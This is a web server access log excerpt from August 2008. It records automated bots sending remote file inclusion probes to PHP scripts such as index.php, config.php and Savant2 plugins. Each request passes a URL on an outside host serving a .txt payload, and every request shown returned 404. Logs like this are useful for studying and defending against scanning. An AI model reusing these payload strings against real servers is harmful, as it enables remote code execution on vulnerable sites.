64.49.254.139 - - [10/Aug/2008:20:11:38 -0600] "GET /logs/access_log.20080706/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:11:38 -0600] "GET /index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:11:38 -0600] "GET /logs/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
194.79.75.195 - - [10/Aug/2008:20:11:39 -0600] "GET /logs/error_log/tiny_includes/config.php?dir_ws=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:20:11:39 -0600] "GET /logs/tiny_includes/config.php?dir_ws=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
202.84.119.204 - - [10/Aug/2008:20:12:23 -0600] "GET /logs/error_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:20:12:38 -0600] "GET /logs/access_log.20080706/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:38 -0600] "GET /index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:38 -0600] "GET /logs/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
88.191.59.190 - - [10/Aug/2008:20:12:41 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
88.191.59.190 - - [10/Aug/2008:20:12:41 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:43 -0600] "GET /logs/access_log.20080706/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:43 -0600] "GET /index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:43 -0600] "GET /logs/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:56 -0600] "GET /logs/error_log.20080420//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:56 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:56 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:57 -0600] "GET /logs/error_log.20080420//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:57 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:12:57 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
72.9.159.178 - - [10/Aug/2008:20:13:06 -0600] "GET /logs/error_log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
64.49.254.139 - - [10/Aug/2008:20:13:18 -0600] "GET /logs/access_log.20080511/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79" 194.79.75.195